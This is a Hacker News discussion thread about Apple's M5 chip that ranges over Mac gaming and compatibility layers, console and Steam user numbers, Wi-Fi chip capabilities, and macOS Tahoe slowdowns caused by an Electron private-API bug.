Apple will never transition to RISC-V; especially when they cofounded ARM. They have 35 years of institutional knowledge in ARM. Their cores and techniques are licensed and patented with mixtures of their own IP and ARM-compatible IP. That is decades away, if ever. Even the assumption RISC-V will eventually achieve equality with ARM performance is untested; as sometimes ISAs do fail at scale (Itanium anyone? While unlikely to repeat; even a discovered 5% structural difference in the negative would handicap adoption permanently.)

"This is the PC gaming industry"

Who said Apple needed to present themselves as a PC gaming alternative over a console alternative?

fruitworks•5h ago
Consoles are dying and PCs are replacing them. Like the original commenter suggested, people want to run PC games. The market has decided that the benefits of compatibility outweigh the added complexity. On the PC you have access to a massive expanding back-catalog of old software, far more competition in the market, mods, and you're able to run whatever software you want alongside games (discord, teamspeak, game streaming, etc.).

Macs are personal computers, whether or not they come from some official IBM Personal Computer compatibility bloodline.

gjsman-1000•5h ago
Steam Deck - 6 million

Sega Saturn - 9 million

Wii U - 13 million

PlayStation 5 - 80 million

Nintendo Switch - 150 million

Nintendo Switch 2 opening weekend - 4 million in 3 days

Sure.

ascagnel_•4h ago
For comparison, the lifetime sales of the first Nintendo Switch would be considered a good year for iPhone sales -- six generations of phones sold >150MM units.

https://en.wikipedia.org/wiki/List_of_best-selling_mobile_ph...

Sohcahtoa82•3h ago
And in the last 48 hours, Steam peaked at 39.5M users online, providing a highly pessimistic lower-bound on how many PC gamers there are.

https://store.steampowered.com/stats/stats/

If you consider time zones (not every PC gamer is online at the same time), the fact that it's not the weekend, and other factors, I'd estimate the PC gaming audience is at least 100M.

Unfortunately, there's no possible way to get an exact number. There are multiple gaming PC manufacturers, not to mention how many gaming PCs are going to be built by hand. I'm part of a PC gaming community, and nearly 90% of us have a PC built by either themselves or a friend/family. https://pdxlan.net/lan-stats/

jolux•5h ago
> I've heard this argument, but it also doesn't pass the sniff test in 2025.

I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school, there was a full port. Unfortunately it's 32 bit and doesn't run anymore and there hasn't been a remaster yet.

galad87•5h ago
Game developers make most of the money shortly after a game release, so having a 15 years old game not working anymore shouldn't make much difference in term of revenues.

Anyway, the whole situation was quite bad. Many games were still 32-bit, even if macOS itself had been mainly 64-bit for almost 10 years or more. And Valve didn't help either, the Steam store is full of 64-bit mislabeled as 32-bit. They could have written a simple script to check whether a game is actually 64-bit or not, instead they decided to do nothing and keep their chaos.

The best solution would have been a lightweight VM to run old 32-bit games, nowadays computer are powerful enough to do so.

littlecranky67•5h ago
I don't buy it either, because Apples GPTK works similar as Proton - they have a DX12-to-Metal Layer that works quite well - if it works. And their GPTK is based on wine, just as proton. It is more other annoyances like lack of steam support. There are patched version of steam circulating that run in GPTK though (offline mode) but that is where everything gets finnicky and brittle. It is mostly community efforts, and I think gaming could be way better on Apple if they embrace the Proton-approach that they started with GPTK.
ldoughty•5h ago
Apple collects no money from Steam sales, so they don't see a reason to support it.

You don't buy Apple to use your computer they way you want to use it. You buy it to use it the way they tell you to. E.g. "you're holding it wrong" fiasco.

In some ways this is good for general consumers (and even developers, with limited config comes less unpredictablilty)... However this generally is bad for power users or "niche" users like Mac gamers.

raw_anon_1111•4h ago
Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

littlecranky67•4h ago
> Apple collects no money from Steam sales, so they don't see a reason to support it.

That is true, but now they are in a position where their hardware is actually more affordable and powerful than their Windows/x86 counterpart - and Win 11 is a shitload of adware and an annoyance in itself, layered ontop of a OS. They could massively expand their hardware sales to the gaming sector.

I'm eyeing at a framework Desktop with an AMD AI 395 APU for gaming (I am happy with just 1080p@60) and am looking at 2000€ to spend, because I wan't a small form factor. Don't quote me on the benchmarks, but a Mac Mini on M4 Pro is probably cheaper and more powerful for gaming - IF it had proper software support.

kllrnohj•4h ago
PlayStation, Nintendo, and Xbox all have 10s of millions of gamers each. Meanwhile MacOS makes up ~2% of steam users which is probably a pretty good proxy for the number of MacOS gamers.

Why would I do anything bespoke at all for such a tiny market? Much less an entirely unique GPU API?

Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

littlecranky67•2h ago
> Why would I do anything bespoke at all for such a tiny market?

Because there is a huge potential here to increase market share.

sapiogram•6h ago
> I wish Apple would take gaming more seriously and make GPTK a first class citizen such as Proton on Linux.

Note that games with anticheat don't work on Linux with Proton either. Everything else does, though.

rpdillon•6h ago
Many of them do, but it's a game of cat and mouse, so it's more hit and miss than I would like.
dralley•5h ago
Several games with anticheat work. But it's up to the developers whether they check the box that allows it to work, which is why even though both Apex Legends and Squad use Easy Anticheat, Squad works and Apex does not.

Of course some anticheats aren't supported at all, like EA Javelin.

ascagnel_•4h ago
Apex Legends is an interesting case because EA/Respawn initially shipped with first-class support for the Steam Deck (going as far as to make changes to the game client so it would get a "Verified" badge from Valve) -- including "check[ing] the box that allows it to work". However, the observation was that the anti-cheat code on Linux wasn't as effective, so they eventually dropped support for it.

https://forums.ea.com/blog/apex-legends-game-info-hub-en/dev...

bob1029•6h ago
> lack of anticheat support.

I just redid my windows machine to get at TPM2.0 and secure boot for Battlefield 6. I did use massgrave this time because I've definitely paid enough Microsoft taxes over the last decade. I thought I would hate this new stuff but it runs much better than the old CSM bios mode.

Anything not protected by kernel level anti cheats I play on my steam deck now. Proton is incredible. I am shocked that games like Elden Ring run this well on a linux handheld.

gwbas1c•6h ago
Honestly, gaming consoles are so much cheaper and "no hassle." I never games on my Mac.
littlecranky67•3h ago
More expensive on the long run, as the games are more expensive and you need some kind of subscription to play online.
dlojudice•5h ago
Good point. Many people (including me) switched to Apple Silicon with the hope (or promise?) of having just one computer for work and leisure, given the potential of the new architecture. That didn't happen, or only partially, which is the same.

In my case, for software development, I'd be happy with an entry-level MacBook Air (now with a minimum of 16GB) for $999.

ryao•5h ago
Off the top of my head, here is what that needs:

  1. Implementing PR_SET_SYSCALL_USER_DISPATCH
  2. Implementing ntsync
  3. Implementing OpenGL 4.6 support (currently only OpenGL 4.1 is supported)
  4. Implementing Vulkan 1.4 with various extensions used by DXVK and vkd3d-proton.
That said, there are alternatives to those things.

  1. Not implementing this would just break games like Jurassic World where DRM hard codes Windows syscalls. I do not believe that there are many of these, although I could be wrong.
  2. There is https://github.com/marzent/wine-msync, although implementing ntsync in the XNU kernel would be better.
  3. The latest OpenGL isn't that important these days now that Vulkan has been widely adopted, although having the latest version would be nice to have for parity. Not many things would suffer if it were omitted.
  4. They could add the things needed for MoltenVK to support Vulkan 1.4 with those extensions on top of Metal:
https://github.com/KhronosGroup/MoltenVK/issues/203

It is a shame that they do not work with Valve on these things. If they did, Proton likely would be supported for MacOS from within Steam and the GPTK would benefit.

hannesfur•5h ago
I agree—the difference between the different compatibility layers and native games is very steep at times. Death Stranding on my M2 Pro looks so good it’s hard to believe, but running GTA Online is so brittle and clunky… Even when games have native macOS builds, it’s rare to find them with Apple Silicon support (and even rarer with Metal support). There is a notable exception though: Arma 3 has experimental Apple Silicon support, though it comes with significant limitations. (Multiplayer, flying & mods) Although I don’t believe it’s in Apple’s interest, gaming on Linux might become an option in the future, even on Mac, but the lack of ARM builds is an even bigger problem there…

Since I am playing mostly MSFS 2024 these days I currently use GeForce Now which is fine, but cloud gaming isn’t still quite there yet…

kllrnohj•4h ago
> Death Stranding on my M2 Pro looks so good it’s hard to believe,

Death Stranding is a great looking game to be sure, but it's also kinda hard to get excited about a 5 year old game achieving rtx 2060 performance on a $2000+ system. And that was apparently worthy of a keynote feature...

imcritic•5h ago
What about wine flavor from crossdressers?
ed_elliott_asc•5h ago
Pretty sure you don’t mean crossdressers!

Codeweavers?

coldpie•5h ago
Little of column A, little of column B ;) This was a fun day in the office: https://www.codeweavers.com/blog/jwhite/2011/1/18/all-dresse...
dimgl•5h ago
Yeah I agree. If it weren't for gaming I would have already uninstalled Windows permanently. It's really unfortunate because it sticks out as the one product in my house that I truly despise but I can't get rid of, due to gaming.

I've been trying to get Unreal Engine to work on my Macbook but Unity is an order of magnitude easier to run. So I'm also stuck doing game development on my PC. The Metal APIs exist and apparently they're quite good... it's a shame that more engines don't support it.

unsupp0rted•5h ago
I can't sell my MacBook Pro because the speakers are so insanely good. Air can't compare. The speakers are worth the extra kilos.
HDThoreaun•3h ago
I have never once used my laptop speakers. Not saying youre wrong but its crazy how different priorities for products can be
prewett•1h ago
I shocked when I tried out the 2019 MBP speakers, they were almost as good as my (low-end) studio headphones. I was even more shocked with the M2 speakers, which are arguably better (although not as flat frequency response, I think, there definitely is something a little artificial, but it sounds really good). I really could not imagine laptop speakers being even close to par to decent headphones. Perhaps they aren't on par with $400 headphones, I've never had any of those. But now by preference I listen on the laptop speakers. It's not a priority--I'm totally happy to go back to the headphones--more like an unexpected perk.
adastra22•54m ago
But why would you ever use the speakers?
mrcwinn•5h ago
Going back to the Air's screen from your Pro will be a steep fall.
littlecranky67•3h ago
Not really, 95% of the time I use it in a dock with 2 external screens.
ge96•4h ago
I'm gonna be looking for a 4080 in SFF form factor since my current gaming rig can't get upgraded to win 11. Also I wouldn't mind a smaller desktop.

edit: for now I'll get that win 10 ESU

gbil•4h ago
On top of that, what is the strategy from Apple on gaming? Advertise extra performance and features that you only get if you upgrade your whole device? This is non-sustainable to put it mildly. There are egpu enclosures with TB5, developing something like that for the Mac would make more sense if they really cared about gaming anyhow.
jasoneckert•6h ago
With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.
willahmad•6h ago
Are we going to see SOTA local coding models anytime soon with this hardware or is it still long way to go?
Etheryte•6h ago
You can already do that, just how slow or fast you go depends on how much you're ready to pay for memory. It's a $1200 premium to go from 36GB to 128GB of unified memory, that cost is hard to justify unless you really need it, or if someone else is paying.
willahmad•5h ago
None is comparable to GPT-5 or Sonnet 4.5 experience
mertbio•4h ago
Yet.
elzbardico•55m ago
Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

Inference speed and fast feedback matter a lot more than perfect generation to me.

StopDisinfo910•6h ago
I appreciate Apple propping up the GPU performance of their SoC but it feels a bit pointless when all the libraries they provide are so insular and disconnected from the rest of the industry.

I personally wish they would learn from the failure of Metal.

Also unleashes? Really? The marketing madness has to stop at some point.

mcv•5h ago
Soon they'll be stomping all over your calculation problems, and then obliterating them!
dralley•4h ago
Not that I've actually used any of these APIs, but supposedly Metal is the best designed Graphics API by a decent margin, it's just handicapped severely by how insular they and their ecosystem are.
bigyabai•4m ago
Depends on what you're comparing to. Many people will point to OpenGL and Vulkan as comparisons, which is fair. But those are just the Open Source alternatives, and Metal itself is a proprietary solution competing against other well-designed alternatives like DirectX and NVN.

I think Metal's ergonomics advantage is a much slimmer lead when you consider the other high-level APIs it competes with.

thurn•6h ago
No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.
infecto•6h ago
I assume that would come with the next release cycle of the MacBook? Isn’t that supposed to be early next year?
nocoiner•6h ago
Apparently not until early next year. I was surprised by this too, but I hadn’t really been following the rumors at all, so I didn’t really have any grounds for being surprised by this.
ytch•6h ago
they usually release Pro or Max model later:

M4: May 2024

M4 pro/max: Oct 2024

https://www.apple.com/newsroom/2024/05/apple-introduces-m4-c...

https://www.apple.com/newsroom/2024/10/apple-introduces-m4-p...

nsteel•5h ago
M3: same time

https://www.apple.com/newsroom/2023/10/apple-unveils-m3-m3-p...

M2: June 2022

M2 pro/max: Jan 2023

https://www.apple.com/newsroom/2022/06/apple-unveils-m2-with...

https://www.apple.com/newsroom/2023/01/apple-unveils-m2-pro-...

jmull•5h ago
No doubt the "wider" versions of the M5 are coming.

My hope is that they are taking longer because of a memory system upgrade that will make running significantly more powerful LLMs locally more feasible.

benjaminclauss•6h ago
Despite the flak Apple gets, there M-series continues to impress me as I learn more about hardware.
vardump•6h ago
I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.
mumber_typhoon•6h ago
The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

All in all, apple is doing some incredible things with hardware.

Software teams at apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers. Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years. I really hope this is not intentional from Apple to make me upgrade. That would be a big let down.

pantalaimon•6h ago
Won't that make Linux support even harder :/
ksec•5h ago
The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz. There were report of N1 not supporting 4096 QAM as well but I didn't check.
HumblyTossed•5h ago
"stuck".

An infinitely small percentage of people can take advantage of 320Mhz. It's fine.

londons_explore•5h ago
Today. But in 3 years time it'll be widespread and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.
shwaj•2h ago
How does it “jam up the airwaves” if its operating at a different frequency than the devices you say it will be jamming?
landl0rd•1h ago
It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use for 320MHz channels beyond maybe very large LAN file transfers which are for some reason happening over WiFi?
fragmede•15m ago
Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading different 10+ Gib large files to test with, and users couldn't possibly conceive of a NAS, nevermind owning one because Netflix has never removed shows while people are watching them, breaking an assumed promise by users. ISP speeds are never ever going to improve either. Everyone knows that!
MrAlex94•5h ago
Does it? If it’s the same WiFi chip used in other M4 Mac’s then it’s still limited to 160MHz:

https://support.apple.com/en-gb/guide/deployment/dep268652e6...

t-3•5h ago
I doubt the number of people in both "has no neighbors" and "owns Apple hardware" camps are significant at all.
fragmede•15m ago
Poe's law?
MrBuddyCasino•4h ago
I don’t think 4096 QAM is realistic anyway, except if your router is 10 cm away from your laptop.
ExoticPearTree•4h ago
> The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz.

I was at a Wi-Fi vendor presentation a while back and they said that 160 Mhz is pretty improbable unless you're leaving alone and no wireless networks around you. And 320 Mhz even less so.

In real life probably the best you can get is 80 Mhz in a really good wireless environment.

amluto•4h ago
I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

WiFi does currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

astrange•1h ago
OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.
shadowpho•4h ago
For which band? I run 160/160 on 5/6ghz and it’s nice. They are short range enough to work. For 2.4 yeah 20mhz only
greg5green•1h ago
For 5ghz, that's a pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160mhz.

For 6ghz? Yeah, not uncommon.

mrtesthah•2h ago
Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4ghz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?
zdw•3h ago
From Apple's support docs:

https://support.apple.com/guide/deployment/wi-fi-ethernet-sp...

No devices support 320Mhz bandwidths, and only supports 160Mhz on 6GHz band on MacBooks and iPads. Some iPhones support 160Mhz on 5GHz as well.

Avamander•47m ago
Channel width is not the only thing that determines the usability or quality of a chipset though.

Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

kokada•5h ago
> Tahoe however makes my M1 Air feel sluggish doing the exact same tasks ive been last couple of years.

I have a work provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs at the house. It is the only one that I can see the mouse teleporting sometimes when I move it fast. This is after disabling transparency in Accessibility settings mind you, it was even worse before.

fersarr•4h ago
same here
ExoticPearTree•4h ago
26.0.1 fixed the sluggishness. 26.0 was pretty unstable - felt like a game dropping frames.
kokada•4h ago
26.0.1 is better, but I can still get sluggishness in a few specific cases.

I just got one example while passing the mouse quickly through my dock (I still use the magnify animation) and I can clearly see it dropping a few frames. This never happened in macOS 15.

speedgoose•4h ago
Do you have a few electron powered apps that didn’t get updated yet?

Electron used to override a private function that makes the Mac OS sluggish on Tahoe, and apparently no one uses Electron apps while doing testing at Apple.

kokada•4h ago
I keep my applications pretty much up-to-date but I didn't check the release notes for each Electron application that I have to make sure they're updated. I still think this is a failure of macOS, since one misbehaving application shouldn't bring the whole environment to slow to a crawl.

What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

Also, it doesn't really matter to me if this was a private function or not, if this was Windows or Gnome/KDE people would blame the developers of the desktop instead.

speedgoose•4h ago
Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.
IMTDb•2h ago
So now you can disregard the notion of "private function" if you pass 100k stars on GitHub ?
ruined•1h ago
all APIs are public APIs
javawizard•1h ago
There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/
0x457•34m ago
Sure, someone will depend on it, we all ignored "private" vs "public" at least once. Okay to do and okay to be mad when your thing breaks because you decided to depend on it? Nope.
dylan604•4h ago
It shouldn't be the user's responsibility to know what architecture the software uses to then need to go look at upgrading them. Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing. Apple releases betas, and the software devs are expected to test their app against it. The problem comes from the app devs using a bit of private code where it is suggested to not do that for this very reason. Even if Apple did test and find the result, it would still be the app dev that would need to fix it. Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???
kokada•3h ago
> Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing.

This happens in pretty much every Electron app as far I know, and lots of Electron apps are like Spotify, VSCode or Slack are very likely to be in the Top 10 or at least Top 100 most used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

> Maybe the thought is that an email from Apple to the dev saying fix your code would more compelling???

Of course not. Apple controls the SDK, they could workaround this in many different ways, for example instead of changing how this function was implemented they could introduce a new method (they're both private so it doesn't matter) and effectively ignore the old method (maybe also they could add a message for developers building their application that this method was removed). It would draw ugly borders in the affected apps but it wouldn't cause this issue at least.

dylan604•3h ago
> (maybe also they could add a message for developers building their application that this method was removed)

why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

kokada•3h ago
> why do we think this would be a solve as the devs clearly ignored the previous message about not using a private method?

If anything the fact that devs can actually access private symbols is an issue with how Apple designed their APIs, because they could make this so annoying to do that nobody would try (for example, stripping symbols).

Also, the fact that devs need to access private symbols to do what they need to do also shows that the public API is lacking at least some features.

Another thing, if this only affected the app itself that would be fine, but this makes the whole system slow to a crawl.

So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

tedivm•2h ago
If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

magicalist•19m ago
> If you actually read the specific bug and use of a private method it really was a stupid decision by one developer awhile ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

I don't think it's that clear cut. It looks like it was a workaround for a MacOS rendering bug going back to at least 2017, landed in 2019 and had no apparent downsides for six years[1].

The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

I probably wouldn't have taken this approach personally (at the very least file the original rendering issue with Apple and note it with the code, though everyone knows the likelihood of getting a even a response on an issue like that), but it wasn't some cargo culted fix.

[1] https://github.com/electron/electron/pull/20360

[2] https://github.com/electron/electron/pull/48376#issuecomment...

wvenable•1h ago
"When developing Windows 95, one manager bought every program available at a local software store..."

https://www.pcworld.com/article/2816273/how-microsofts-windo...

0x457•37m ago
Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron because delivering shitty electron experience only benefit their native apps.
placatedmayhem•4h ago
The check script I've been recommending is here:

https://github.com/tkafka/detect-electron-apps-on-mac

About half of the apps I use regularly have been fixed. Some might never be fixed, though...

EasyMark•4h ago
wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on reddit. Some config change
joshstrange•3h ago
> Run launchctl setenv CHROME_HEADLESS 1 on every system start. The CHROME_HEADLESS flag has a side effect of disabling Electron app window shadows, which makes them ugly, but also stops triggering the issue.

From: https://www.reddit.com/r/MacOS/comments/1nvoirl/i_made_a_scr...

EasyMark•4h ago
This is why I stay on previous release until at least 0.2 or 0.3 to let them work out the bugs so I dont' have to deal with them, there was nothing in 26 that felt pressing to me that I would need to update
abustamam•2h ago
Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.
michelb•3h ago
The OS and stock apps are much slower in Tahoe even. And the UI updates/interactions are also slower. I’m lucky I only upgraded my least used machine, and that’s a well stocked M2.
astrange•1h ago
It should not be slower. File a report in Feedback Assistant.
nikanj•1h ago
Or more likely nobody gives a damn about performance while doing testing.
kobalsky•4h ago
my tinfoil-hat theory is that on each OS iteration Apple adds a new feature that leverages the latest chips hardware acceleration features and for older chips they do software-only implementations.

they ship-of-thesseus the crap out of their OS but replacing with parts that need these new hardware features that run slow on older chips due to software-only implementations.

I got the first generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV, it cannot even display the virtual keyboard without stuttering like crazy, it lags switching apps, there's a delay for everything, this thing was smooth as butter on release.

thewebguyd•4h ago
I have the 4th gen (2020) iPad Pro with the A12X Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite still being performant as ever on iPadOS 18. I'm talking huge drop in performance, stutters and slow downs everywhere.

I was considering just replacing the battery and keeping it for several more years but now I feel forced to upgrade which has me considering whether I still want/need an iPad since I'd also have to buy a new magic keyboard since they redesigned it, and they bumped the price ($1299 now vs. $999 when I got the 4th gen) so I'd be looking at $1700. Trying to hold out for an iPad Air with ProMotion.

I may be in the minority here, but I think 5 years is too short of a lifespan for these devices at this point. Early days when things were advancing like crazy, sure. But now? I have 8 year old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery not withstanding)

qingcharles•4h ago
That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)
thewebguyd•3h ago
Interesting. Might try a factory reset then and see. There's noticable lag for me, it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine, it's interacting with the OS that's really sluggish.
gosub100•2h ago
Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.
sgerenser•44m ago
Apple has never made an iPad with a fan
dwood_dev•1h ago
8th Gen iPad is about the same on iPadOS 26 as 18 for me, which is slow. The 32GB really handicapped it for even being usable as to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

The iPad Air 13 with a M3 is a really nice experience. Very fast device.

trinix912•25m ago
Plus they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you've been smart to save SHSH blobs and all that) so the only option to revert to a smooth version now is to download a sketchy jailbreak.
tsunamifury•2h ago
Transparency disabling ads anothe draw layer that is opaque on top making it even worse than when it’s on
prettyblocks•2h ago
I'm on an M2 with 24GB ram and it feels like it flies as fast as ever.
runjake•1h ago
It's probably due to the Electron bug[1]. A lot of common apps haven't patched up yet.

I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

1. https://avarayr.github.io/shamelectron/

Here's a script I got from somewhere that shows unpatched Electron apps on your system:

Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...

xrisk•1h ago
hmm there are apps produced by your script that claim to be fixed according to https://avarayr.github.io/shamelectron/ (Signal, Discord, Notion, etc). And I checked that those apps are updated. Which one’s correct?
runjake•1h ago
HN broke the script. Here's a link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
Eric_WVGG•1h ago
unpatched include Asana, Bitwarden, Dropbox… some pretty high-profile apps
fjarlq•1h ago
Helpful script, except it prints the same line regardless of the version found.
geoffpado•1h ago
If I’m remembering correctly, the original script he found had different emoji in the two lines (red X vs. green checkmark), but since HN comments strip emoji, pasting it here made them equivalent.
runjake•1h ago
HN nerfed the script. Here you go: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
Angostura•1h ago
I don't get this - I have an M1 iMac - haven't noticed much difference.
lelandfe•5h ago
As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges to Apple’s software when it used to astound. iOS Settings search will flash “No Results” as you begin to type which is comically amateurish. The macOS menu bar control panels can’t be keyboard navigated... It’s just silly.

I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

butlike•5h ago
iirc, there's a setting to make the menu bar navigatable. you just need to "alt+tab" to it with some weird button combo, like Ctrl + Cmd + 1 or something.
lelandfe•4h ago
You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

And the answer, of course, is the same for so much of macOS' present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still have yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

...Anyway.

netcoyote•1h ago
There's also an app, MenuWhere, that enables you to configure different keys to walk the menu bar. It's free (but nagware). https://manytricks.com/menuwhere/
vessenes•4h ago
Liquid Glass feels rushed to me. Tons of UI annoyances especially on iPhone - it's suddenly many clicks to get to prior calls for instance, a core way I call people. I'm imagining it will get ironed out over the next two years.
bombcar•54m ago
It really does. It’s a two-year update and hey should have had two teams - one for Liquid Glass working for the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.
jtbayly•4h ago
Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the calendar app on my Apple watch, and tap on the meeting, and tap the address. (I don't have an Apple watch.)

2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

3. It is impossible to share a contact card from Messages.app (both iOS and MacOS). You have to leave messages, go to contacts and select the contact to share. Contacts should be one of the apps that shows up in the "+" list like photos, camera, cash, and plenty third party apps.

4. You still have to set the default system mail app in MacOS as a setting in the Mail.app, instead of in system settings. Last I checked, I'm pretty sure you couldn't do this, without first setting up an account in the Mail.app. Infuriating.

grincho•2h ago
I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.
askonomm•4h ago
There already is something like it (though not Apple-exclusive): https://grumpy.website/
jerf•3h ago
"iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

I'd love to agree that comically amateurish, but apparently there's something about settings dialogs that make them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft start menu is also comically slow if you try to access control panels through it, although it's just comically slow at search in general. Even Brave here visibly chokes for like 200ms if I search in its preferences dialog... which compared to Android or Windows is instant but still strikes me as a bit to the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

(The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

robenkleene•2h ago
The parent isn't commenting about the speed of search, just that saying "No Results", when they really mean "we're still checking for results" is bad UI (which I agree with).
fodkodrasz•1h ago
It is possibly Null value pattern in action, which is a good thing in my opinion (as in robust), though its display this way is a bit suboptimal.

Funny I'm defending them, but I think this is not even a papercut in my opinion, while they have far bigger issues.

fragmede•6m ago
I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that is particularly annoying is Apple shit used to be so exceptionally polished. Not sure what emotion I want to project on them as to why they're like that now (or if it's even actually true), but it's the perception that if they're no longer getting the little stuff like that polished anymore, what else just isn't being done to the same high standard?
SoKamil•2h ago
The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.
vizzier•2h ago
Might have to be more specific than Android and Windows. Tried them on my devices (S24, windows 11) and they're practically instantaneous.
Insanity•5h ago
Yeah I love my M1 iPad Pro. But the "liquid glass" update made it feel slower. Really only the 'unlock' feels slower, once I'm using it it's fine. But it's slightly annoying and does make me want to update this year to the m5.

But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

asimovDev•5h ago
my dad's got a pre AS iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this
knowitnone3•3h ago
"make me want to update this year to the m5." Then Apple software devs did what they were told
butlike•5h ago
I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for the subtle nudge to upgrade from Apple makes sense to me.

It feels very much like how I imagine someone living in the late 1800's might have felt. The advent of electricity, the advent of cars, but can't predict airplanes, even though they're right around the corner and they'll have likely seen them in their lifetime.

WhitneyLand•5h ago
“nobody really needs to upgrade that for most things”

Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

AI, dev, some content scenarios, etc…

dawnerd•4h ago
